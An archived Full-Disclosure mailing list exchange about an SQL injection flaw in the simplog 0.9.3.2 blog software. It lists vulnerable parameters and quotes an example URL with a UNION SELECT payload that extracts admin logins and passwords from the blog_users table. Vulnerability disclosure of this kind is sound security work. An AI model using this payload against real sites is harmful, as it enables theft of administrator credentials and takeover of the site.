[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] simplog 0.9.3.2 SQL injection



Javor,

It seems rgod found this vulnerability back in April of 2006.

http://www.milw0rm.com/exploits/1663

<>
  ii)
  http://[target]/[path]/index.php?blogid=[sql]
  http://[target]/[path]/archive.php?blogid=[sql]
  http://[target]/[path]/archive.php?m=[sql]
  http://[target]/[path]/archive.php?y=[sql]

/str0ke

On 1/1/07, Javor Ninov <drfrancky@xxxxxxxxxxx> wrote:
> Afected Software:
> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>
> Site:
> http://www.simplog.org
> Simplog provides an easy way for users to add blogging capabilities to
> their existing websites. Simplog is written in PHP and compatible with
> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
> Powerful, yet simple
>
> Vulnerability:
> SQL Injection in archive.php
> other files probably also affected
>
> Example:
> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>
> Vendor status:
> NOT NOTIFIED
>
>
> Javor Ninov aka DrFrancky
> drfrancky shift+2 securax.org
> http://securitydot.net/
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/